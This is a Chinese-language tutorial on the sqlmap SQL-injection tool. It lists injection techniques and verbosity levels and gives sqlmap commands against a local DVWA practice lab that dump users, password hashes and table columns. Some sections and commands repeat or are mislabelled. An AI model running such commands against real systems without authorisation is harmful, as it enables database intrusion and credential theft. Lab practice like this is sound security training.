Sqlmap 是一種開源的滲透測試工具,能夠自動檢測和利用 Sql 注入漏洞以及接入該數據庫的服務器。它擁有很是強大的檢測引擎、具備多種特性的滲透測試器、經過數據庫指紋提取訪問底層文件系統並經過外帶鏈接執行命令,使用 Sqlmap 工具將極大的簡化咱們的測試工做量。html
Sqlmap 是一個自動化的 SQL 注入工具,其主要功能是掃描、發現並利用給定的 Url 的 Sql 注入漏洞,目前支持 MySQL、 Oracle、 PostgreSQL、 Microsoft SQL Server、 Microsoft Access 等主流數據庫。 Sqlmap 使用 5 種 SQL 注入技術(不加參數默認測試全部注入技術):python
基於布爾的盲注,便可以根據返回頁面判斷條件真假的注入。sql
基於時間的盲注,即不能根據頁面返回內容判斷任何信息,用條件語句查看時間延遲語句是否執行(即頁面返回時間是否增長)來判斷。數據庫
基於報錯注入,即頁面會返回錯誤信息,或者把注入的語句的結果直接返回在頁面中。服務器
聯合查詢注入,能夠使用union的狀況下的注入。cookie
堆查詢注入,能夠同時執行多條語句的執行時的注入。工具
當你使用 Sqlmap 對一個注入點是進行了測試時,能夠使用 -v x
參數指定回顯信息的複雜度,x
屬於[0~6]:測試
共有 7 個等級,默認爲 1:debug
等級 | 解釋 |
---|---|
- 0 | 只顯示python錯誤以及嚴重的信息。 |
- 1 | 同時顯示基本信息和警告信息。(默認) |
- 2 | 同時顯示debug信息。 |
- 3 | 同時顯示注入的payload。 |
- 4 | 同時顯示HTTP請求。 |
- 5 | 同時顯示HTTP響應頭。 |
- 6 | 同時顯示HTTP響應頁面 |
sqlmap 本地實驗能夠 本地部署滲透測試靶場:dvwacode
當你使用 Sqlmap 對一個注入點是進行了測試時,能夠使用 -v x
參數指定回顯信息的複雜度,x
屬於[0~6]:
共有 7 個等級,默認爲 1:
等級 | 解釋 |
---|---|
- 0 | 只顯示python錯誤以及嚴重的信息。 |
- 1 | 同時顯示基本信息和警告信息。(默認) |
- 2 | 同時顯示debug信息。 |
- 3 | 同時顯示注入的payload。 |
- 4 | 同時顯示HTTP請求。 |
- 5 | 同時顯示HTTP響應頭。 |
- 6 | 同時顯示HTTP響應頁面
|
獲取服務器狀況:
python sqlmap.py -u "localhost/html/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=vnua5n6lp5gh66sjrn908d4nd1" #注意參數必須使用雙引號括起來
獲取當前數據庫和用戶密碼:
python sqlmap.py -u "localhost/html/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=vnua5n6lp5gh66sjrn908d4nd1" -b --current-user --current-db
python sqlmap.py -u "localhost/html/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=vnua5n6lp5gh66sjrn908d4nd1" --users --password
用默認字典表把數據庫密碼跑出來,若是跑不出來,就是哈希值了。
獲取全部數據庫名,表名,字段名;
python sqlmap.py -u "localhost/html/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=vnua5n6lp5gh66sjrn908d4nd1" --users --password
python sqlmap.py -u "localhost/html/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=vnua5n6lp5gh66sjrn908d4nd1" --users --password
python sqlmap.py -u "localhost/html/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=vnua5n6lp5gh66sjrn908d4nd1" -D "dvwa" -T "users" --columns